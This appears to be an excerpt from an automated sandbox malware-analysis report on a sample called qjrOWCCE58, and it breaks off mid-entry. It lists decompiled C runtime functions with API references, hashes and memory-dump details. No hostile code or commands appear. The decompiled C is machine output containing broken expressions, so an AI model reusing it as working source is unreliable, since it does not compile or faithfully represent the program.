Instruction Fuzzy Hash: F4F01C3618022DBBCF662FD5DC09A9D3F26FF097A0B044020FE09C9520C6328960BB96

Uniqueness

Uniqueness Score: -1.00%

Function 0040D7C0 Relevance: 6.0, APIs: 4, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E0040D7C0(long _a4) {
				long _t3;
				intOrPtr* _t7;

				_t7 =  *0x43c514;
				if(_t7 == 0) {
					LeaveCriticalSection(0x43c4fc);
					_t3 = WaitForSingleObjectEx( *0x43c4f8, _a4, 0);
					EnterCriticalSection(0x43c4fc);
					return _t3;
				}
				 *0x42c218(0x43c4f4, 0x43c4fc, _a4);
				return  *_t7();
			}

0x0040d7c4
0x0040d7cc
0x0040d7ed
0x0040d7fe
0x0040d805
0x00000000
0x0040d805
0x0040d7dd
0x00000000

APIs

SleepConditionVariableCS.KERNELBASE(?,0040D75D,00000064), ref: 0040D7E3
LeaveCriticalSection.KERNEL32(0043C4FC,?,?,0040D75D,00000064,?,0040489A,0043CE9C,?,41D6575C,00000000,?), ref: 0040D7ED
WaitForSingleObjectEx.KERNEL32(?,00000000,?,0040D75D,00000064,?,0040489A,0043CE9C,?,41D6575C,00000000,?), ref: 0040D7FE
EnterCriticalSection.KERNEL32(0043C4FC,?,0040D75D,00000064,?,0040489A,0043CE9C,?,41D6575C,00000000,?), ref: 0040D805

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
String ID:
API String ID: 3269011525-0
Opcode ID: b8ead2da323922b014113d621d8c640cbb3f90f0c5dbef7b5d519be9ddb8d07e
Instruction ID: 1151d91cb023fceba4b061bba24b24371fa023ca84a3d7bac8e11ee0ff1cce3e
Opcode Fuzzy Hash: b8ead2da323922b014113d621d8c640cbb3f90f0c5dbef7b5d519be9ddb8d07e
Instruction Fuzzy Hash: 08E09232A40534FBCA212B90EC99AAE3F289F19751F009032F90576161CB6428528FED

Uniqueness

Uniqueness Score: -1.00%

Function 00419437 Relevance: 6.0, APIs: 4, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419437() {

				E0041CA88( *0x43cbd0);
				 *0x43cbd0 = 0;
				E0041CA88( *0x43cbd4);
				 *0x43cbd4 = 0;
				E0041CA88( *0x43ccd0);
				 *0x43ccd0 = 0;
				E0041CA88( *0x43ccd4);
				 *0x43ccd4 = 0;
				return 1;
			}

0x00419440
0x0041944d
0x00419453
0x0041945e
0x00419464
0x0041946f
0x00419475
0x0041947d
0x00419486

APIs

_free.LIBCMT ref: 00419440

Part of subcall function 0041CA88: HeapFree.KERNEL32(00000000,00000000,?,00424557,?,00000000,?,?,?,004247FA,?,00000007,?,?,00424CED,?), ref: 0041CA9E
Part of subcall function 0041CA88: GetLastError.KERNEL32(?,?,00424557,?,00000000,?,?,?,004247FA,?,00000007,?,?,00424CED,?,?), ref: 0041CAB0

_free.LIBCMT ref: 00419453
_free.LIBCMT ref: 00419464
_free.LIBCMT ref: 00419475

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: f094aa664fadec9221f43444061d43ef2227f01dc5a331decd673533ce2da88e
Instruction ID: 1a1b8ddb481c15977fd15399855537cf11de4de093ec92d974314461fe59f068
Opcode Fuzzy Hash: f094aa664fadec9221f43444061d43ef2227f01dc5a331decd673533ce2da88e
Instruction Fuzzy Hash: 11E0B6758D02249BC602EF25BDCA589BA63BB64746701312AF408322B1CF391552AB8D

Uniqueness

Uniqueness Score: -1.00%

Function 0083969E Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 008396A7

Part of subcall function 0083CCEF: HeapFree.KERNEL32(00000000,00000000,?,008447BE,?,00000000,?,?,?,00844A61,?,00000007,?,?,00844F54,?), ref: 0083CD05
Part of subcall function 0083CCEF: GetLastError.KERNEL32(?,?,008447BE,?,00000000,?,?,?,00844A61,?,00000007,?,?,00844F54,?,?), ref: 0083CD17

_free.LIBCMT ref: 008396BA
_free.LIBCMT ref: 008396CB
_free.LIBCMT ref: 008396DC

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: f094aa664fadec9221f43444061d43ef2227f01dc5a331decd673533ce2da88e
Instruction ID: df53f55f2cbe2ec59ff52e1dbd014de2fbbba84749f77d1ee37b85881f0ad5de
Opcode Fuzzy Hash: f094aa664fadec9221f43444061d43ef2227f01dc5a331decd673533ce2da88e
Instruction Fuzzy Hash: 27E0EC758911209BC6026F38FE8A449BE63F785742B013026F40CB62B5CB311513AFCE

Uniqueness

Uniqueness Score: -1.00%

Function 00403420 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 207
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E00403420(void* __ebx, intOrPtr* __ecx, void* __edi) {
				intOrPtr _v8;
				char _v16;
				char _v24;
				signed int _v32;
				char _v36;
				char _v40;
				char _v44;
				intOrPtr _v48;
				char _v52;
				char _v68;
				intOrPtr _v72;
				char _v76;
				char _v92;
				intOrPtr _v96;
				void* _v116;
				signed int _v132;
				void* __esi;
				void* __ebp;
				signed int _t71;
				signed int _t72;
				intOrPtr _t81;
				intOrPtr* _t87;
				intOrPtr _t96;
				void* _t109;
				void* _t111;
				char _t115;
				char _t118;
				intOrPtr* _t127;
				intOrPtr _t128;
				void* _t130;
				intOrPtr _t133;
				intOrPtr _t134;
				void* _t136;
				void* _t137;
				intOrPtr* _t141;
				void* _t142;
				intOrPtr* _t144;
				intOrPtr _t145;
				void* _t146;
				intOrPtr* _t147;
				signed int _t151;
				void* _t155;
				signed int _t158;
				void* _t159;

				_push(__ebx);
				_t111 = _t155;
				_t158 = (_t155 - 0x00000008 & 0xfffffff8) + 4;
				_v8 =  *((intOrPtr*)(_t111 + 4));
				_t151 = _t158;
				_push(0xffffffff);
				_push(0x42ab65);
				_push( *[fs:0x0]);
				_push(_t111);
				_t159 = _t158 - 0x58;
				_t71 =  *0x43b054; // 0x41d6575c
				_t72 = _t71 ^ _t151;
				_v32 = _t72;
				_push(__edi);
				_push(_t72);
				 *[fs:0x0] =  &_v24;
				_t141 = __ecx;
				_v44 = __ecx;
				_v44 = __ecx;
				E0040A490(_t111,  &_v68, _t130, __ecx,  *((intOrPtr*)(_t111 + 8)));
				_t144 =  *((intOrPtr*)(_t111 + 0x10));
				_v44 =  *((intOrPtr*)(_t111 + 0xc));
				_v16 = 0;
				_t115 = _v52;
				if(_t115 != 0) {
					if(_v48 - _t115 < 2) {
						_v36 = 0;
						E00402270(_t111,  &_v68, __ecx, _t144, 2, _v36, ": ", 2);
					} else {
						_v52 = _t115 + 2;
						_t109 =  >=  ? _v68 :  &_v68;
						 *((short*)(_t109 + _t115)) = 0x203a;
						 *((char*)(_t109 + _t115 + 2)) = 0;
					}
				}
				 *((intOrPtr*)( *_t144 + 8))( &_v92, _v44);
				_v16 = 1;
				_t118 = _v76;
				_t132 =  >=  ? _v92 :  &_v92;
				_t145 = _v52;
				_v44 = _t118;
				_push(_t118);
				_push( >=  ? _v92 :  &_v92);
				if(_t118 > _v48 - _t145) {
					_v44 = 0;
					_push(_v44);
					_push(_t118);
					_t81 = E00402270(_t111,  &_v68, _t141, _t145);
				} else {
					_v52 = _t145 + _t118;
					_t102 =  >=  ? _v68 :  &_v68;
					_t145 = _t145 + ( >=  ? _v68 :  &_v68);
					_push(_t145);
					E0040ECB0();
					_t81 = _v44;
					_t159 = _t159 + 0xc;
					 *((char*)(_t145 + _t81)) = 0;
				}
				_t133 = _v72;
				if(_t133 < 0x10) {
					L11:
					asm("movups xmm1, [ebp-0x38]");
					 *_t141 = 0x42c2d4;
					asm("movq xmm0, [ebp-0x28]");
					asm("movq [ebp-0x58], xmm0");
					asm("xorps xmm0, xmm0");
					asm("movd eax, xmm1");
					asm("movq [edi+0x4], xmm0");
					asm("movups [ebp-0x68], xmm1");
					_t121 =  >=  ? _t81 :  &_v116;
					_v52 = 0;
					_v48 = 0xf;
					_v68 = 0;
					_v40 =  >=  ? _t81 :  &_v116;
					_v36 = 1;
					E0040E761( &_v40, _t141 + 4);
					_t134 = _v96;
					_t159 = _t159 + 8;
					 *_t141 = 0x42c320;
					if(_t134 < 0x10) {
						L15:
						 *_t141 = 0x437c8c;
						 *((intOrPtr*)(_t141 + 0xc)) =  *((intOrPtr*)(_t111 + 0xc));
						 *((intOrPtr*)(_t141 + 0x10)) =  *((intOrPtr*)(_t111 + 0x10));
						 *[fs:0x0] = _v24;
						_pop(_t142);
						_pop(_t146);
						return E0040D3AF(_t141, _t111, _v32 ^ _t151,  *((intOrPtr*)(_t111 + 0x10)), _t142, _t146);
					} else {
						_t127 = _v116;
						_t136 = _t134 + 1;
						_t87 = _t127;
						if(_t136 < 0x1000) {
							L14:
							_push(_t136);
							E0040D5EF(_t127);
							goto L15;
						} else {
							_t127 =  *((intOrPtr*)(_t127 - 4));
							_t136 = _t136 + 0x23;
							if(_t87 - _t127 + 0xfffffffc > 0x1f) {
								goto L17;
							} else {
								goto L14;
							}
						}
					}
				} else {
					_t128 = _v92;
					_t137 = _t133 + 1;
					_t96 = _t128;
					if(_t137 < 0x1000) {
						L10:
						_push(_t137);
						_t81 = E0040D5EF(_t128);
						_t159 = _t159 + 8;
						goto L11;
					} else {
						_t127 =  *((intOrPtr*)(_t128 - 4));
						_t136 = _t137 + 0x23;
						if(_t96 - _t127 + 0xfffffffc > 0x1f) {
							E00411D17(_t111, _t127, _t136, __eflags);
							L17:
							E00411D17(_t111, _t127, _t136, __eflags);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t151);
							_push(_t145);
							_t147 = _t127;
							 *_t147 = 0x42c2d4;
							E0040E7C4(_t147 + 4);
							__eflags = _v132 & 0x00000001;
							if((_v132 & 0x00000001) != 0) {
								_push(0x14);
								E0040D5EF(_t147);
							}
							return _t147;
						} else {
							goto L10;
						}
					}
				}
			}

0x00403420
0x00403421
0x00403429
0x00403430
0x00403434
0x00403436
0x00403438
0x00403443
0x00403444
0x00403445
0x00403448
0x0040344d
0x0040344f
0x00403453
0x00403454
0x00403458
0x0040345e
0x00403460
0x0040346a
0x0040346d
0x00403475
0x00403478
0x0040347b
0x00403482
0x00403487
0x00403493
0x004034bc
0x004034c8
0x00403495
0x0040349b
0x004034a6
0x004034aa
0x004034ae
0x004034ae
0x00403493
0x004034d8
0x004034db
0x004034e6
0x004034e9
0x004034f0
0x004034f5
0x004034f8
0x004034f9
0x004034fc
0x00403523
0x00403527
0x0040352a
0x0040352e
0x004034fe
0x00403505
0x0040350b
0x0040350f
0x00403511
0x00403512
0x00403517
0x0040351a
0x0040351d
0x0040351d
0x00403533
0x00403539
0x00403567
0x00403567
0x0040356e
0x00403574
0x00403579
0x0040357e
0x00403585
0x00403589
0x0040358e
0x00403592
0x00403595
0x0040359f
0x004035aa
0x004035af
0x004035b2
0x004035b6
0x004035bb
0x004035be
0x004035c1
0x004035ca
0x004035f4
0x004035fc
0x00403602
0x00403605
0x0040360b
0x00403613
0x00403614
0x00403625
0x004035cc
0x004035cc
0x004035cf
0x004035d0
0x004035d8
0x004035ea
0x004035ea
0x004035ec
0x00000000
0x004035da
0x004035da
0x004035dd
0x004035e8
0x00000000
0x00000000
0x00000000
0x00000000
0x004035e8
0x004035d8
0x0040353b
0x0040353b
0x0040353e
0x0040353f
0x00403547
0x0040355d
0x0040355d
0x0040355f
0x00403564
0x00000000
0x00403549
0x00403549
0x0040354c
0x00403557
0x00403628
0x0040362d
0x0040362d
0x00403632
0x00403633
0x00403634
0x00403635
0x00403636
0x00403637
0x00403638
0x00403639
0x0040363a
0x0040363b
0x0040363c
0x0040363d
0x0040363e
0x0040363f
0x00403640
0x00403643
0x00403644
0x00403649
0x00403650
0x00403658
0x0040365c
0x0040365e
0x00403661
0x00403666
0x0040366d
0x00000000
0x00000000
0x00000000
0x00403557
0x00403547

APIs

___std_exception_copy.LIBVCRUNTIME ref: 004035B6
___std_exception_destroy.LIBVCRUNTIME ref: 00403650

Strings

@6@, xrefs: 004035FC

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy___std_exception_destroy
String ID: @6@
API String ID: 2970364248-1880851511
Opcode ID: e1e61efe2bbe39f08e5e56a8747a91c867f6e70853314fe41d5c2517ae195d16
Instruction ID: c23a1bf63e4509e80bd7becdcafb62e24a1fe8d26698bb81b8f88f90f02766e5
Opcode Fuzzy Hash: e1e61efe2bbe39f08e5e56a8747a91c867f6e70853314fe41d5c2517ae195d16
Instruction Fuzzy Hash: 87719271E002089BDB04DFA8D881BDEFBB5EF49314F54812EE805B7391D778A954CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0041822D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 004182BD

Strings

pow, xrefs: 00418295, 004182B2

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 69d5b95bab8b419057d39a648948f8631f60fb2eda5cf8ee2e36766f01976362
Instruction ID: d97681fef68a39b63b3719a1cd6210cfd1fae7eaadd36d6141c3e6f25d312d82
Opcode Fuzzy Hash: 69d5b95bab8b419057d39a648948f8631f60fb2eda5cf8ee2e36766f01976362
Instruction Fuzzy Hash: 2F518D71B0850196CB127715E9513AB2BA4EB60B40FB44AAFF495853B9EF3D8CC1CA4E

Uniqueness

Uniqueness Score: -1.00%

Function 00838494 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00838524

Strings

pow, xrefs: 008384FC, 00838519

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 818a5391f8960c8d5f39ba70e36c59a97c97d235033763d7b387fe15102f8941
Instruction ID: 5417b48cb325df1370b95f5d3767c5cdb4d6e90457d82fa882b2d0407c169cd2
Opcode Fuzzy Hash: 818a5391f8960c8d5f39ba70e36c59a97c97d235033763d7b387fe15102f8941
Instruction Fuzzy Hash: 63517CA5A0430ED6CF11B718DD1936A6BA4FB80740F704D68F496C22E8EF348CD4DE8A

Uniqueness

Uniqueness Score: -1.00%

Function 00422D1F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00422D1F(signed int __edx, char _a4) {
				signed int _v8;
				char _v264;
				char _v520;
				char _v776;
				char _v1800;
				char _v1814;
				struct _cpinfo _v1820;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t60;
				signed int _t63;
				char _t68;
				signed char _t69;
				signed int _t70;
				signed int _t80;
				signed int _t81;
				char _t82;
				signed int _t85;
				signed char _t86;
				signed int _t87;
				signed int _t88;
				void* _t89;
				intOrPtr _t90;
				signed int _t91;

				_t88 = __edx;
				_t60 =  *0x43b054; // 0x41d6575c
				_v8 = _t60 ^ _t91;
				_t2 =  &_a4; // 0x423144
				_t90 =  *_t2;
				if( *(_t90 + 4) == 0xfde9 || GetCPInfo( *(_t90 + 4),  &_v1820) == 0) {
					_t81 = 0;
					__eflags = 0;
					_t89 = 0x100;
					_t82 = 0;
					do {
						_t46 = _t82 - 0x61; // -97
						_t88 = _t46;
						_t47 = _t88 + 0x20; // -65
						__eflags = _t47 - 0x19;
						if(_t47 > 0x19) {
							__eflags = _t88 - 0x19;
							if(_t88 > 0x19) {
								_t63 = _t81;
							} else {
								 *(_t90 + _t82 + 0x19) =  *(_t90 + _t82 + 0x19) | 0x00000020;
								_t56 = _t82 - 0x20; // -32
								_t63 = _t56;
							}
						} else {
							 *(_t90 + _t82 + 0x19) =  *(_t90 + _t82 + 0x19) | 0x00000010;
							_t52 = _t82 + 0x20; // 0x20
							_t63 = _t52;
						}
						 *(_t90 + _t82 + 0x119) = _t63;
						_t82 = _t82 + 1;
						__eflags = _t82 - _t89;
					} while (_t82 < _t89);
					goto L26;
				} else {
					_t81 = 0;
					_t89 = 0x100;
					_t68 = 0;
					do {
						 *((char*)(_t91 + _t68 - 0x104)) = _t68;
						_t68 = _t68 + 1;
					} while (_t68 < 0x100);
					_t69 = _v1814;
					_t85 =  &_v1814;
					_v264 = 0x20;
					while(1) {
						_t99 = _t69;
						if(_t69 == 0) {
							break;
						}
						_t88 =  *(_t85 + 1) & 0x000000ff;
						_t70 = _t69 & 0x000000ff;
						while(1) {
							__eflags = _t70 - _t88;
							if(_t70 > _t88) {
								break;
							}
							__eflags = _t70 - _t89;
							if(_t70 >= _t89) {
								break;
							}
							 *((char*)(_t91 + _t70 - 0x104)) = 0x20;
							_t70 = _t70 + 1;
							__eflags = _t70;
						}
						_t85 = _t85 + 2;
						__eflags = _t85;
						_t69 =  *_t85;
					}
					E00420045(_t99, _t81, 1,  &_v264, _t89,  &_v1800,  *(_t90 + 4), _t81);
					E0041FBBC(_t99, _t81,  *((intOrPtr*)(_t90 + 0x21c)), _t89,  &_v264, _t89,  &_v520, _t89,  *(_t90 + 4), _t81);
					E0041FBBC(_t99, _t81,  *((intOrPtr*)(_t90 + 0x21c)), 0x200,  &_v264, _t89,  &_v776, _t89,  *(_t90 + 4), _t81);
					_t80 = _t81;
					do {
						_t86 =  *(_t91 + _t80 * 2 - 0x704) & 0x0000ffff;
						if((_t86 & 0x00000001) == 0) {
							__eflags = _t86 & 0x00000002;
							if((_t86 & 0x00000002) == 0) {
								_t87 = _t81;
							} else {
								 *(_t90 + _t80 + 0x19) =  *(_t90 + _t80 + 0x19) | 0x00000020;
								_t87 =  *((intOrPtr*)(_t91 + _t80 - 0x304));
							}
						} else {
							 *(_t90 + _t80 + 0x19) =  *(_t90 + _t80 + 0x19) | 0x00000010;
							_t87 =  *((intOrPtr*)(_t91 + _t80 - 0x204));
						}
						 *(_t90 + _t80 + 0x119) = _t87;
						_t80 = _t80 + 1;
					} while (_t80 < _t89);
					L26:
					return E0040D3AF(_t63, _t81, _v8 ^ _t91, _t88, _t89, _t90);
				}
			}

0x00422d1f
0x00422d2a
0x00422d31
0x00422d36
0x00422d36
0x00422d41
0x00422e53
0x00422e53
0x00422e55
0x00422e5a
0x00422e5c
0x00422e5c
0x00422e5c
0x00422e5f
0x00422e62
0x00422e65
0x00422e71
0x00422e74
0x00422e82
0x00422e76
0x00422e79
0x00422e7d
0x00422e7d
0x00422e7d
0x00422e67
0x00422e67
0x00422e6c
0x00422e6c
0x00422e6c
0x00422e84
0x00422e8b
0x00422e8c
0x00422e8c
0x00000000
0x00422d5f
0x00422d5f
0x00422d61
0x00422d66
0x00422d68
0x00422d68
0x00422d6f
0x00422d70
0x00422d74
0x00422d7a
0x00422d80
0x00422da8
0x00422da8
0x00422daa
0x00000000
0x00000000
0x00422d89
0x00422d8d
0x00422d9f
0x00422d9f
0x00422da1
0x00000000
0x00000000
0x00422d92
0x00422d94
0x00000000
0x00000000
0x00422d96
0x00422d9e
0x00422d9e
0x00422d9e
0x00422da3
0x00422da3
0x00422da6
0x00422da6
0x00422dc2
0x00422de3
0x00422e0b
0x00422e13
0x00422e15
0x00422e15
0x00422e20
0x00422e30
0x00422e33
0x00422e43
0x00422e35
0x00422e35
0x00422e3a
0x00422e3a
0x00422e22
0x00422e22
0x00422e27
0x00422e27
0x00422e45
0x00422e4c
0x00422e4d
0x00422e90
0x00422e9e
0x00422e9e

APIs

GetCPInfo.KERNEL32(0000FDE9,?,0000000C,00000000,00000000), ref: 00422D51

Strings

D1B, xrefs: 00422D36
, xrefs: 00422D96

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: Info
String ID: $D1B
API String ID: 1807457897-28303970
Opcode ID: 2e49cd8e1a3834cc281b5240df093a50e3e9db09381a38c1afc473bf64379861
Instruction ID: e27c18945fcd99a3f851336286f84c8d0397958ec42026201ad3a14e6a802cca
Opcode Fuzzy Hash: 2e49cd8e1a3834cc281b5240df093a50e3e9db09381a38c1afc473bf64379861
Instruction Fuzzy Hash: 06419D706042686BDB218A18DE84BFB7BFD9B05304FA404AEE5CA87142D2B89E45DB19

Uniqueness

Uniqueness Score: -1.00%

Function 00410CAC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 69%

			E00410CAC(void* __ecx, void* __edx, signed char* _a4, signed char* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v36;
				void* _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v56;
				void _v60;
				signed char* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t74;
				void* _t75;
				char _t76;
				signed char _t78;
				signed int _t80;
				signed char* _t81;
				signed int _t82;
				signed int _t83;
				intOrPtr* _t87;
				void* _t90;
				signed char* _t93;
				intOrPtr* _t96;
				signed char _t97;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr* _t101;
				signed int _t102;
				signed int _t103;
				signed char _t108;
				signed char* _t111;
				signed int _t112;
				void* _t113;
				signed char* _t116;
				void* _t121;
				signed int _t123;
				void* _t130;
				void* _t131;

				_t110 = __edx;
				_t100 = __ecx;
				_t96 = _a4;
				if( *_t96 == 0x80000003) {
					return _t74;
				} else {
					_t75 = E00410586(_t96, __ecx, __edx, _t113, _t121, _t113, _t121);
					if( *((intOrPtr*)(_t75 + 8)) != 0) {
						__imp__EncodePointer(0);
						_t121 = _t75;
						if( *((intOrPtr*)(E00410586(_t96, __ecx, __edx, 0, _t121) + 8)) != _t121 &&  *_t96 != 0xe0434f4d &&  *_t96 != 0xe0434352) {
							_t87 = E0040E478(__edx, 0, _t121, _t96, _a8, _a12, _a16, _a20, _a28, _a32);
							_t130 = _t130 + 0x1c;
							if(_t87 != 0) {
								L16:
								return _t87;
							}
						}
					}
					_t76 = _a20;
					_v24 = _t76;
					_v20 = 0;
					if( *((intOrPtr*)(_t76 + 0xc)) > 0) {
						_push(_a28);
						E0040E3AB(_t96, _t100, 0, _t121,  &_v40,  &_v24, _a24, _a16, _t76);
						_t112 = _v36;
						_t131 = _t130 + 0x18;
						_t87 = _v40;
						_v16 = _t87;
						_v8 = _t112;
						if(_t112 < _v28) {
							_t102 = _t112 * 0x14;
							_v12 = _t102;
							do {
								_t103 = 5;
								_t90 = memcpy( &_v60,  *((intOrPtr*)( *_t87 + 0x10)) + _t102, _t103 << 2);
								_t131 = _t131 + 0xc;
								if(_v60 <= _t90 && _t90 <= _v56) {
									_t93 = _v44 + 0xfffffff0 + (_v48 << 4);
									_t108 = _t93[4];
									if(_t108 == 0 ||  *((char*)(_t108 + 8)) == 0) {
										if(( *_t93 & 0x00000040) == 0) {
											_push(0);
											_push(1);
											E00410882(_t112, _t96, _a8, _a12, _a16, _a20, _t93, 0,  &_v60, _a28, _a32);
											_t112 = _v8;
											_t131 = _t131 + 0x30;
										}
									}
								}
								_t112 = _t112 + 1;
								_t87 = _v16;
								_t102 = _v12 + 0x14;
								_v8 = _t112;
								_v12 = _t102;
							} while (_t112 < _v28);
						}
						goto L16;
					}
					E00418419(_t96, _t100, _t110, 0, _t121);
					asm("int3");
					_t111 = _v68;
					_push(_t96);
					_push(_t121);
					_push(0);
					_t78 = _t111[4];
					if(_t78 == 0) {
						L41:
						_t80 = 1;
					} else {
						_t101 = _t78 + 8;
						if( *_t101 == 0) {
							goto L41;
						} else {
							_t116 = _a4;
							if(( *_t111 & 0x00000080) == 0 || ( *_t116 & 0x00000010) == 0) {
								_t97 = _t116[4];
								_t123 = 0;
								if(_t78 == _t97) {
									L33:
									if(( *_t116 & 0x00000002) == 0 || ( *_t111 & 0x00000008) != 0) {
										_t81 = _a8;
										if(( *_t81 & 0x00000001) == 0 || ( *_t111 & 0x00000001) != 0) {
											if(( *_t81 & 0x00000002) == 0 || ( *_t111 & 0x00000002) != 0) {
												_t123 = 1;
											}
										}
									}
									_t80 = _t123;
								} else {
									_t59 = _t97 + 8; // 0x6e
									_t82 = _t59;
									while(1) {
										_t98 =  *_t101;
										if(_t98 !=  *_t82) {
											break;
										}
										if(_t98 == 0) {
											L29:
											_t83 = _t123;
										} else {
											_t99 =  *((intOrPtr*)(_t101 + 1));
											if(_t99 !=  *((intOrPtr*)(_t82 + 1))) {
												break;
											} else {
												_t101 = _t101 + 2;
												_t82 = _t82 + 2;
												if(_t99 != 0) {
													continue;
												} else {
													goto L29;
												}
											}
										}
										L31:
										if(_t83 == 0) {
											goto L33;
										} else {
											_t80 = 0;
										}
										goto L42;
									}
									asm("sbb eax, eax");
									_t83 = _t82 | 0x00000001;
									goto L31;
								}
							} else {
								goto L41;
							}
						}
					}
					L42:
					return _t80;
				}
			}

0x00410cac
0x00410cac
0x00410cb3
0x00410cbc
0x00410ddb
0x00410cc2
0x00410cc4
0x00410cce
0x00410cd1
0x00410cd7
0x00410ce1
0x00410d06
0x00410d0b
0x00410d10
0x00410dd7
0x00000000
0x00410dd8
0x00410d10
0x00410ce1
0x00410d16
0x00410d19
0x00410d1c
0x00410d22
0x00410d28
0x00410d3a
0x00410d3f
0x00410d42
0x00410d45
0x00410d48
0x00410d4b
0x00410d51
0x00410d57
0x00410d5a
0x00410d5d
0x00410d6c
0x00410d6d
0x00410d6d
0x00410d72
0x00410d85
0x00410d87
0x00410d8c
0x00410d97
0x00410d99
0x00410d9b
0x00410db7
0x00410dbc
0x00410dbf
0x00410dbf
0x00410d97
0x00410d8c
0x00410dc5
0x00410dc6
0x00410dc9
0x00410dcc
0x00410dcf
0x00410dd2
0x00410d5d
0x00000000
0x00410d51
0x00410ddc
0x00410de1
0x00410de5
0x00410de8
0x00410de9
0x00410dea
0x00410deb
0x00410df0
0x00410e68
0x00410e6a
0x00410df2
0x00410df2
0x00410df8
0x00000000
0x00410dfa
0x00410dfd
0x00410e00
0x00410e07
0x00410e0a
0x00410e0e
0x00410e40
0x00410e43
0x00410e4a
0x00410e50
0x00410e5a
0x00410e63
0x00410e63
0x00410e5a
0x00410e50
0x00410e64
0x00410e10
0x00410e10
0x00410e10
0x00410e13
0x00410e13
0x00410e17
0x00000000
0x00000000
0x00410e1b
0x00410e2f
0x00410e2f
0x00410e1d
0x00410e1d
0x00410e23
0x00000000
0x00410e25
0x00410e25
0x00410e28
0x00410e2d
0x00000000
0x00000000
0x00000000
0x00000000
0x00410e2d
0x00410e23
0x00410e38
0x00410e3a
0x00000000
0x00410e3c
0x00410e3c
0x00410e3c
0x00000000
0x00410e3a
0x00410e33
0x00410e35
0x00000000
0x00410e35
0x00000000
0x00000000
0x00000000
0x00410e00
0x00410df8
0x00410e6b
0x00410e6f
0x00410e6f

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00410CD1

Strings

RCC, xrefs: 00410CEB
MOC, xrefs: 00410CE3

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 303833b43aea1f4179fef7c5366d32006cd1626733a0f2a177099824f101065e
Instruction ID: 2920550aa844166164f8adc1eff5983f663a412fc3c250a0762776ab89157aca
Opcode Fuzzy Hash: 303833b43aea1f4179fef7c5366d32006cd1626733a0f2a177099824f101065e
Instruction Fuzzy Hash: FB417B71900109AFCF15DF94DD81AEEBBB5FF48304F14805AF904A7252D779A9D0DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00830F13 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 00830F38

Strings

